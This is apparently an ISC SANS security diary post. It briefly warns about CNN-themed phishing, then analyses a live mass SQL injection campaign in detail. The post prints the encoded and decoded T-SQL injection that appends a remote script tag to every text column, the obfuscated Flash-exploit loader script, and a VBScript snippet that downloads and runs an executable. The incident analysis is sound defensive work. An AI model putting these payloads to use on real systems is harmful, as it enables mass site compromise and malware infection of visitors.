'CNN - My Custom Alert'
Thanks to our readers for letting us know that they are receiving a good amount of some very authentic looking phishing spam. Although the email appears to be from CNN again, the origination address is not even obfuscated. ISC Handler, Daniel had written a story about the "CNN - Top Ten" storm worm a few days ago.
isc.sans.org/diary.html
These sort of emails have one big thing going for them. The ability to get that user to click. The CNN brand is trusted and recognized by almost all of our users. Anyone seeing this email may not think twice about clicking on the link unless we tell them not to. What a great opportunity for user training. Send out a short Security Awareness Email to your users and explain to them what it really happening. Ask them to tell their kids too.
Far too many people are making this a very profitable way for cyber-criminals to make money. Try to help your end users understand how to spot a fraudulent email address, how to dissect a domain name and find a masked url address. Just think about all the infections and exploitations you may prevent.
For more information see the Anti-Phishing Working Group website.
More SQL Injections - very active right now
Scott one of our readers wrote in to let us know that attempts were being made on his servers through an SQL injection. He was the first and assisted with analysis, but he was not the last. Since the first report we have received several in the last 4 hours or so. There seems to be a lot of activity with this particular attack.
It looks like a repeat/variant on the attacks mentioned by Bojan here.
Overview:
|---i/f16.swf
|--- i1.html ---|---i/f28.swf
|--- Flash.htm -------| |---i/f64.swf
| |--- f2.html ---|---i/f115.swf
|--- 06014.htm |---i/f45.swf
| |---i/f47.swf
w.js --- new.htm ---|--- yahoo.htm--|
| |
|--- office.htm--| --rondll32.exe--msyahoo.exe--wsv.exe/thunder.exe
| |
|--- ksx.htm ----|
The Injection:
The string being injected is
“DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726
368617228323535292C40432076617263686172283430303029204445434C415245205461626
C655F437572736------------snip ------------2204445414C4C4F43436F72%20AS%20CHAR(4000));
EXEC(@S); HTTP/1.1" 302 26 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET
CLR 1.1.4322; .NET CLR 2.0.50727)" :”
Which breaks down into:
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231or b.xtype=167) OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="hXXp://sdo.
1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="hXXp:
//sdo. 1000mg.cn/csrss/w.js"></script><!--''') FETCH NEXT FROM Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor% AS% CHAR(@)
Various types of sites seem to be hit at the moment. From the reports we've had it is not specific to asp, cfm, php, but we don't have a lot of information on this just yet.
Next:
A user visiting the site will hit w.js which, if they are using english, will pull down new.htm. new.htm reports to a stats site and has a number of iframes that grab the next set of htm pages, flash.htm, 06014.htm, yahoo.htm, office.htm and ksx.htm. Flash.htm checks to see if you are using IE or FF and selects either i1.html or f2.html
i1.html & f2.html
These file contains some java script:
<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
c="118,97,114,32,118,101,114,115,105,111----snip----116,46,119,114,105,116,101,40,34,34,41";c=eval("String.fromCharCode("+c+")");document.write("<script>"+c+"<\/script>");
</script>S
This expands out to:
var version=deconcept.SWFObjectUtil.getPlayerVersion();if(version['major']==9){document.getElementById('flashversion').innerHTML="";if(version['rev']==115){var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==64){var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==47){var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==45){var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==28){var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==16){var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}}; document.write("")
So depending on the flash version running and browser a different file is tried (the IE version uses i64, etc). Detection for these is poor. The IE versions 9/36 at VT detect the file as malicious and for FF 10/36 detect the file as being malicious.
yahoo.htm
The yahoo.htm file executes a vbscript to download rondll32.exe and saves it as msyahoo.exe after which it attempts to execute.
pre>
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "hXXp://www.XXXXX.com/XXXX/rondll32.exe","c:\\msyahoo.exe",5,1,"tiany"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"c:\\msyahoo.exe"
</script
</pre>
Office.htm
Attempts to create activeX objects and pulls the same rondll32.exe. It looks like rondll32.exe pulls down thunder.exe and wsv.exe
ksx.htm
Attempts get the browser to include the rondll32.exe file
Detection for rondll32.exe is good with most AV products catching this one.
06014.htm
was unavailable at the time I checked.
These attacks are happening right now. The people that reported them identified the attacks in their log files and IDS systems. It is good to see that people are checking their logs. Currently about 4000 sites are infected, but mostly with the older version of w.js and a different go-to site. This round looks like it has just started. We'll keep an eye on how this develops.
Cheers.
Mark - Shearwater
Comments